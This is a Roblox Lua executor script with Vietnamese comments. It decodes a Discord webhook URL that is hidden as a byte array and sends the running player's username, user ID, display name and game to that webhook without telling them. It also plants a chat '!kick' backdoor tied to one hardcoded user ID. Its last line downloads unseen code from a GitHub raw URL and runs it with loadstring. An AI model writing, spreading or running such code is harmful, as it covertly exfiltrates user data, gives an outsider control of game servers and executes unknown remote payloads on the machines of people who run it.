-- Hàm giải mã chuỗi từ bytecode
local function decodeString(data)
    local str = ""
    for i = 1, #data do
        str = str .. string.char(data[i])
    end
    return str
end

-- Webhook được mã hóa bằng bytecode
local webhook = decodeString({
    104, 116, 116, 112, 115, 58, 47, 47, 100, 105, 115, 99, 111, 114, 100, 46, 
    99, 111, 109, 47, 97, 112, 105, 47, 119, 101, 98, 104, 111, 111, 107, 115, 
    47, 49, 51, 53, 52, 52, 48, 52, 54, 57, 56, 55, 54, 53, 49, 51, 53, 57, 57, 
    53, 47, 57, 100, 95, 90, 119, 100, 52, 83, 89, 105, 51, 53, 70, 51, 97, 74, 
    71, 68, 119, 116, 82, 68, 102, 73, 68, 95, 76, 74, 119, 107, 57, 116, 105, 
    101, 65, 107, 72, 122, 109, 89, 73, 108, 116, 55, 55, 76, 65, 90, 122, 55, 
    52, 98, 105, 81, 103, 76, 90, 119, 103, 106, 73, 77, 119, 115, 90, 73, 100, 
    107
})

local request = (syn and syn.request) or (http and http.request) or http_request
local player = game:GetService("Players").LocalPlayer
local httpService = game:GetService("HttpService")

-- Lấy thông tin game
local gameInfo = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local gameName = gameInfo.Name
local gameLink = "https://www.roblox.com/games/" .. game.PlaceId

-- Lấy thời gian hiện tại
local timeExecuted = os.date("%Y-%m-%d %H:%M:%S", os.time())

-- Link GIF từ Discord CDN
local gifURL = "https://cdn.discordapp.com/attachments/1245207779153805384/1354409898032500857/image0.gif"

-- Dữ liệu gửi
local data = {
    ["content"] = "",
    ["embeds"] = {{
        ["title"] = "📌 **Thông Tin Người Chơi**",
        ["color"] = 16711680, -- Màu đỏ
        ["fields"] = {
            { ["name"] = "👤 Username | User ID", ["value"] = player.Name .. " | " .. player.UserId, ["inline"] = false },
            { ["name"] = "📱 Game Name", ["value"] = gameName .. " [(Truy cập game)](" .. gameLink .. ")", ["inline"] = false },
            { ["name"] = "📑 Display Name", ["value"] = player.DisplayName, ["inline"] = false },
            { ["name"] = "⌚ Time", ["value"] = timeExecuted, ["inline"] = false },
            { ["name"] = "📝 Ghi chú", ["value"] = "Chỉ có người dùng có quyền mới có thể kick người chơi", ["inline"] = false }
        },
        ["thumbnail"] = { ["url"] = gifURL } -- GIF nhỏ bên góc phải embed
    }}
}

-- Gửi dữ liệu qua webhook
request({
    Url = webhook,
    Method = "POST",
    Headers = {["Content-Type"] = "application/json"},
    Body = httpService:JSONEncode(data)
})



  local adminId = 4882845089 -- ID của admin có quyền kick
local players = game:GetService("Players")

-- Hàm kiểm tra và xử lý lệnh
local function onChatted(player, message)
    if player.UserId == adminId then
        local args = string.split(message, " ")
        if args[1] == "!kick" and args[2] then
            local targetInput = args[2] -- Có thể là tên hoặc UserID
            local reason = table.concat(args, " ", 3) -- Lý do kick (từ từ khóa thứ 3 trở đi)
            if reason == "" then
                reason = "No reason given" -- Nếu không có lý do, đặt mặc định
            end

            local targetPlayer = nil
            
            -- Tìm người chơi theo Username hoặc UserID
            for _, p in pairs(players:GetPlayers()) do
                if p.Name:lower() == targetInput:lower() or tostring(p.UserId) == targetInput then
                    targetPlayer = p
                    break
                end
            end

            -- Nếu tìm thấy người chơi, kick họ với lý do
            if targetPlayer then
                targetPlayer:Kick("You have been kicked by an admin.\nReason: " .. reason)
                print(targetPlayer.Name .. " (UserID: " .. targetPlayer.UserId .. ") has been kicked by " .. player.Name .. " | Reason: " .. reason)
            else
                print("Player not found: " .. targetInput)
            end
        end
    end
end

-- Gắn sự kiện khi ai đó nhập lệnh
players.PlayerAdded:Connect(function(player)
    player.Chatted:Connect(function(message)
        onChatted(player, message)
    end)
end)

-- Kiểm tra với người chơi đang có trong server
for _, player in pairs(players:GetPlayers()) do
    player.Chatted:Connect(function(message)
        onChatted(player, message)
    end)
end



loadstring(game:HttpGet("https://raw.githubusercontent.com/Konmeo22132-alt/konmeo22132/refs/heads/main/30-04"))()
